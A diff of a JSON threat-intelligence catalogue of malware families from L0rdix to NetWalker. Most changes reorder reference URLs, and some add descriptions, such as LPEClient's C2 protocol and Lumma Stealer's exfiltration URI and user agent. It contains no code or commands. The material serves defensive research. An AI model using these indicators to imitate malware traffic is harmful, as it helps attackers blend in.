+33391,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", - "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/", + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py", "https://www.bromium.com/decrypting-l0rdix-rats-c2/", - "https://blog.ensilo.com/l0rdix-attack-tool", "https://twitter.com/hexlax/status/1058356670835908610", - "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py" + "https://blog.ensilo.com/l0rdix-attack-tool", + "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/" ], "synonyms": [ "lordix" @@ -31902,13 +33411,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz", "https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/", - "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/", + "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/", "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20", - "https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/", - "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/", - "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware", + "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/", "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/" + "https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/", + "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware", + "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/" ], "synonyms": [], "type": [] @@ -31935,8 +33444,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", - "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" ], "synonyms": [], @@ -31950,10 +33459,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey", - "https://www.mandiant.com/resources/apt41-us-state-governments", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/", - "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html" + "https://www.mandiant.com/resources/apt41-us-state-governments", + "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", + "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/" ], "synonyms": [ "PortReuse" @@ -31977,13 +33486,32 @@ "uuid": "1efd4902-ff9e-4e71-8867-6eddb9bc456c", "value": "LOWZERO" }, + { + "description": "LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim's file system to store the downloaded payload. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.\r\n\r\nLPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the the DLL execution). As the final step, malware looks for the export CloseEnv and executes it. \r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient", + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf", + "https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", + "https://securelist.com/lazarus-threatneedle/100803/" + ], + "synonyms": [ + "LPEClientTea" + ], + "type": [] + }, + "uuid": "754c8f79-743b-49fc-971e-bcd60edef9d8", + "value": "LPEClient" + }, { "description": "This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service \"transfer.sh\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper", - "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf", - "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/" + "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/", + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf" ], "synonyms": [], "type": [] @@ -31992,7 +33520,7 @@ "value": "lsassDumper" }, { - "description": "", + "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detecci\u00f3n de Lu0bot, ya que no causa s\u00edntomas significativos, como una grave disminuci\u00f3n del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetr\u00eda. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot", @@ -32022,8 +33550,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer", - "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/", - "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/" + "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/", + "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" ], "synonyms": [], "type": [] @@ -32036,13 +33564,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html" ], "synonyms": [ @@ -32054,17 +33582,20 @@ "value": "Luminosity RAT" }, { - "description": "Lumma is an information stealer written in C, sold as a Malware-as-a-Service by LummaC on Russian-speaking underground forums and Telegram since at least August 2022. Lumma's capabilities are those of a classic stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.", + "description": "Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor \"Shamel\", who goes by the alias \"Lumma\". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the URI \"/c2sock\" and the user agent \"TeslaBrowser/5.5\".\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma", - "https://twitter.com/sekoia_io/status/1572889505497223169", - "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/", - "https://twitter.com/Ishusoka/status/1614028229307928582", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx", - "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer", "https://twitter.com/fumik0_/status/1559474920152875008", - "https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7" + "https://twitter.com/sekoia_io/status/1572889505497223169", + "https://www.esentire.com/blog/the-case-of-lummac2-v4-0", + "https://twitter.com/Ishusoka/status/1614028229307928582", + "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer", + "https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7", + "https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/", + "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx" ], "synonyms": [ "LummaC2 Stealer" @@ -32158,9 +33689,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", - "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html", + "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", - "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/" + "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" ], "synonyms": [ "Adneukine", @@ -32190,11 +33721,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv", - "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py", - "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py", "https://youtu.be/3RYbkORtFnk", - "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html" + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py", + "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py", + "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/" ], "synonyms": [], "type": [] @@ -32207,9 +33738,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.macaw", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/" + "https://killingthebear.jorgetesta.tech/actors/evil-corp" ], "synonyms": [], "type": [] @@ -32218,17 +33749,17 @@ "value": "Macaw" }, { - "description": "According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", + "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", - "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://securelist.com/el-machete/66108/", - "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/", - "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf", - "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6", - "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html" + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf", + "https://securelist.com/el-machete/66108/", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html", + "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/", + "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america" ], "synonyms": [ "El Machete" @@ -32268,9 +33799,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie", - "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/", + "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d", "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", - "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d" + "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/" ], "synonyms": [], "type": [] @@ -32283,9 +33814,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.youtube.com/watch?v=nUjxH1gW53s", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html", "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/", - "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html" + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html" ], "synonyms": [], "type": [] @@ -32298,26 +33831,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", - "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware", - "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/", - "https://asec.ahnlab.com/en/41889/", - "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/", "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372", - "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/", - "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/", - "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/", - "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/", - "https://www.youtube.com/watch?v=lqWJaaofNf4", "https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/", - "https://asec.ahnlab.com/en/19273/", - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://asec.ahnlab.com/en/41889/", "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/", - "http://asec.ahnlab.com/1124", - "https://asec.ahnlab.com/en/30645/", - "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", - "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", + "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/", + "https://www.malwarebytes.com/blog/news/2018/07/magniber-ransomware-improves-expands-within-asia", + "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/", + "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/", "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/", - "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/" + "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware", + "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/", + "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/", + "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/", + "https://asec.ahnlab.com/en/19273/", + "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/", + "https://asec.ahnlab.com/en/30645/", + "https://www.youtube.com/watch?v=lqWJaaofNf4", + "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", + "http://asec.ahnlab.com/1124", + "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", + "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/" ], "synonyms": [], "type": [] @@ -32330,68 +33864,68 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto", - "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", - "https://lopqto.me/posts/automated-dynamic-import-resolving", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/", - "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", - "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", - "https://www.youtube.com/watch?v=q8of74upT_g", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas", - "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", - "https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/", - "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/", - "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", - "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", - "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/", - "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html", - "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", - "https://zengo.com/bitcoin-ransomware-detective-ucsf/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://zero2auto.com/2020/05/19/netwalker-re/", - "https://www.ic3.gov/media/news/2020/200929-2.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/", - "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/", - "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware" + "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/", + "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", + "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/", + "https://www.ic3.gov/media/news/2020/200929-2.pdf", + "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", + "https://lopqto.me/posts/automated-dynamic-import-resolving", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", + "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas", + "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", + "https://zengo.com/bitcoin-ransomware-detective-ucsf/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", + "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", + "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.youtube.com/watch?v=q8of74upT_g", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", + "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html", + "https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", + "https://zero2auto.com/2020/05/19/netwalker-re/", + "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/", + "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf", + "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + 